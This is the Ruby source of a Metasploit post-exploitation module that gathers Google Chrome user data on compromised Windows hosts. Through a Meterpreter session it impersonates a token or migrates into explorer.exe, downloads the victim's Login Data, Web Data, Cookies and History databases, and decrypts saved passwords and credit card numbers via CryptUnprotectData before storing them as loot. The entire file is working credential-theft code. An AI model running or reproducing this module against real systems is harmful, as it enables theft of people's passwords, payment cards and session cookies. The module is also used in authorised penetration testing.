287 lines
8.3 KiB
Ruby
287 lines
8.3 KiB
Ruby
##
|
|
# $Id$
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex'
|
|
require 'msf/core/post/file'
|
|
require 'msf/core/post/windows/priv'
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
include Msf::Post::File
|
|
include Msf::Post::Windows::Priv
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "Windows Gather Google Chrome User Data Enumeration",
|
|
'Description' => %q{
|
|
This module will collect user data from Google Chrome and attempt to decrypt
|
|
sensitive information.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Version' => '$Revision$',
|
|
'Platform' => ['windows'],
|
|
'SessionTypes' => ['meterpreter'],
|
|
'Author' =>
|
|
[
|
|
'Sven Taute', #Original (Meterpreter script)
|
|
'sinn3r', #Metasploit post module
|
|
'Kx499' #x64 support
|
|
]
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
OptBool.new('MIGRATE', [false, 'Automatically migrate to explorer.exe', false]),
|
|
], self.class)
|
|
end
|
|
|
|
def decrypt_data(data)
|
|
rg = session.railgun
|
|
pid = session.sys.process.open.pid
|
|
process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
|
|
|
|
mem = process.memory.allocate(1024)
|
|
process.memory.write(mem, data)
|
|
|
|
if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
|
|
|
|
addr = [mem].pack("V")
|
|
len = [data.length].pack("V")
|
|
ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
|
|
len, addr = ret["pDataOut"].unpack("V2")
|
|
|
|
else
|
|
|
|
addr = [mem].pack("Q")
|
|
len = [data.length].pack("Q")
|
|
ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
|
|
len, addr = ret["pDataOut"].unpack("Q2")
|
|
|
|
end
|
|
|
|
return "" if len == 0
|
|
decrypted = process.memory.read(addr, len)
|
|
return decrypted
|
|
end
|
|
|
|
def process_files(username)
|
|
secrets = ""
|
|
decrypt_table = Rex::Ui::Text::Table.new(
|
|
"Header" => "Decrypted data",
|
|
"Indent" => 1,
|
|
"Columns" => ["Name", "Decrypted Data", "Origin"]
|
|
)
|
|
|
|
@chrome_files.each do |item|
|
|
next if item[:sql] == nil
|
|
next if item[:raw_file] == nil
|
|
|
|
db = SQLite3::Database.new(item[:raw_file])
|
|
begin
|
|
columns, *rows = db.execute2(item[:sql])
|
|
rescue
|
|
next
|
|
end
|
|
db.close
|
|
|
|
rows.map! do |row|
|
|
res = Hash[*columns.zip(row).flatten]
|
|
if item[:encrypted_fields] && session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
|
|
|
|
item[:encrypted_fields].each do |field|
|
|
name = (res["name_on_card"] == nil) ? res["username_value"] : res["name_on_card"]
|
|
origin = (res["label"] == nil) ? res["origin_url"] : res["label"]
|
|
pass = res[field + "_decrypted"] = decrypt_data(res[field])
|
|
if pass != nil and pass != ""
|
|
decrypt_table << [name, pass, origin]
|
|
secret = "#{name}:#{pass}..... #{origin}"
|
|
secrets << secret << "\n"
|
|
vprint_good("Decrypted data: #{secret}")
|
|
end
|
|
end
|
|
end
|
|
end
|
|
end
|
|
|
|
if secrets != ""
|
|
path = store_loot("chrome.decrypted", "text/plain", session, decrypt_table.to_s, "decrypted_chrome_data.txt", "Decrypted Chrome Data")
|
|
print_status("Decrypted data saved in: #{path}")
|
|
end
|
|
end
|
|
|
|
def extract_data(username)
|
|
#Prepare Chrome's path on remote machine
|
|
chrome_path = @profiles_path + "\\" + username + @data_path
|
|
raw_files = {}
|
|
|
|
@chrome_files.map{ |e| e[:in_file] }.uniq.each do |f|
|
|
remote_path = chrome_path + '\\' + f
|
|
|
|
#Verify the path before downloading the file
|
|
begin
|
|
x = session.fs.file.stat(remote_path)
|
|
rescue
|
|
print_error("#{f} not found")
|
|
next
|
|
end
|
|
|
|
# Store raw data
|
|
local_path = store_loot("chrome.raw.#{f}", "text/plain", session, "chrome_raw_#{f}")
|
|
raw_files[f] = local_path
|
|
session.fs.file.download_file(local_path, remote_path)
|
|
print_status("Downloaded #{f} to '#{local_path}'")
|
|
end
|
|
|
|
#Assign raw file paths to @chrome_files
|
|
raw_files.each_pair do |raw_key, raw_path|
|
|
@chrome_files.each do |item|
|
|
if item[:in_file] == raw_key
|
|
item[:raw_file] = raw_path
|
|
end
|
|
end
|
|
end
|
|
|
|
return true
|
|
end
|
|
|
|
def steal_token
|
|
current_pid = session.sys.process.open.pid
|
|
target_pid = session.sys.process["explorer.exe"]
|
|
return if target_pid == current_pid
|
|
|
|
if not session.incognito
|
|
session.core.use("incognito")
|
|
|
|
if not session.incognito
|
|
print_error("Unable to load incognito")
|
|
return false
|
|
end
|
|
end
|
|
|
|
print_status("Impersonating token: #{target_pid.to_s}")
|
|
begin
|
|
session.sys.config.steal_token(target_pid)
|
|
return true
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
print_error("Cannot impersonate: #{e.message.to_s}")
|
|
return false
|
|
end
|
|
end
|
|
|
|
def migrate(pid=nil)
|
|
current_pid = session.sys.process.open.pid
|
|
if pid != nil and current_pid != pid
|
|
#PID is specified
|
|
target_pid = pid
|
|
print_status("current PID is #{current_pid}. Migrating to pid #{target_pid}")
|
|
begin
|
|
session.core.migrate(target_pid)
|
|
rescue ::Exception => e
|
|
print_error(e.message)
|
|
return false
|
|
end
|
|
else
|
|
#No PID specified, assuming to migrate to explorer.exe
|
|
target_pid = session.sys.process["explorer.exe"]
|
|
if target_pid != current_pid
|
|
@old_pid = current_pid
|
|
print_status("current PID is #{current_pid}. migrating into explorer.exe, PID=#{target_pid}...")
|
|
begin
|
|
session.core.migrate(target_pid)
|
|
rescue ::Exception => e
|
|
print_error(e)
|
|
return false
|
|
end
|
|
end
|
|
end
|
|
return true
|
|
end
|
|
|
|
def run
|
|
@chrome_files = [
|
|
{ :raw => "", :in_file => "Web Data", :sql => "select * from autofill;"},
|
|
{ :raw => "", :in_file => "Web Data", :sql => "SELECT username_value,origin_url,signon_realm FROM logins;"},
|
|
{ :raw => "", :in_file => "Web Data", :sql => "select * from autofill_profiles;"},
|
|
{ :raw => "", :in_file => "Web Data", :sql => "select * from credit_cards;", :encrypted_fields => ["card_number_encrypted"]},
|
|
{ :raw => "", :in_file => "Cookies", :sql => "select * from cookies;"},
|
|
{ :raw => "", :in_file => "History", :sql => "select * from urls;"},
|
|
{ :raw => "", :in_file => "History", :sql => "SELECT url FROM downloads;"},
|
|
{ :raw => "", :in_file => "History", :sql => "SELECT term FROM keyword_search_terms;"},
|
|
{ :raw => "", :in_file => "Login Data", :sql => "select * from logins;", :encrypted_fields => ["password_value"]},
|
|
{ :raw => "", :in_file => "Bookmarks", :sql => nil},
|
|
{ :raw => "", :in_file => "Preferences", :sql => nil},
|
|
]
|
|
|
|
@old_pid = nil
|
|
@host_info = session.sys.config.sysinfo
|
|
migrate_success = false
|
|
|
|
# If we can impersonate a token, we use that first.
|
|
# If we can't, we'll try to MIGRATE (more aggressive) if the user wants to
|
|
got_token = steal_token
|
|
if not got_token and datastore["MIGRATE"]
|
|
migrate_success = migrate
|
|
end
|
|
|
|
host = session.session_host
|
|
|
|
#Get Google Chrome user data path
|
|
sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
|
|
os = @host_info['OS']
|
|
if os =~ /(Windows 7|2008|Vista)/
|
|
@profiles_path = sysdrive + "\\Users\\"
|
|
@data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
|
|
elsif os =~ /(2000|NET|XP)/
|
|
@profiles_path = sysdrive + "\\Documents and Settings\\"
|
|
@data_path = "\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default"
|
|
end
|
|
|
|
#Get user(s)
|
|
usernames = []
|
|
uid = session.sys.config.getuid
|
|
if is_system?
|
|
print_status("Running as SYSTEM, extracting user list...")
|
|
print_error("(Automatic decryption will not be possible. You might want to manually migrate, or set \"MIGRATE=true\")")
|
|
session.fs.dir.foreach(@profiles_path) do |u|
|
|
usernames << u if u !~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
|
|
end
|
|
print_status "Users found: #{usernames.join(", ")}"
|
|
else
|
|
print_status "Running as user '#{uid}'..."
|
|
usernames << session.fs.file.expand_path("%USERNAME%")
|
|
end
|
|
|
|
|
|
has_sqlite3 = true
|
|
begin
|
|
require 'sqlite3'
|
|
rescue LoadError
|
|
print_error("SQLite3 is not available, and we are not able to parse the database.")
|
|
has_sqlite3 = false
|
|
end
|
|
|
|
#Process files for each username
|
|
usernames.each do |u|
|
|
print_status("Extracting data for user '#{u}'...")
|
|
success = extract_data(u)
|
|
process_files(u) if success and has_sqlite3
|
|
end
|
|
|
|
# Migrate back to the original process
|
|
if datastore["MIGRATE"] and @old_pid and migrate_success == true
|
|
print_status("Migrating back...")
|
|
migrate(@old_pid)
|
|
end
|
|
end
|
|
|
|
end
|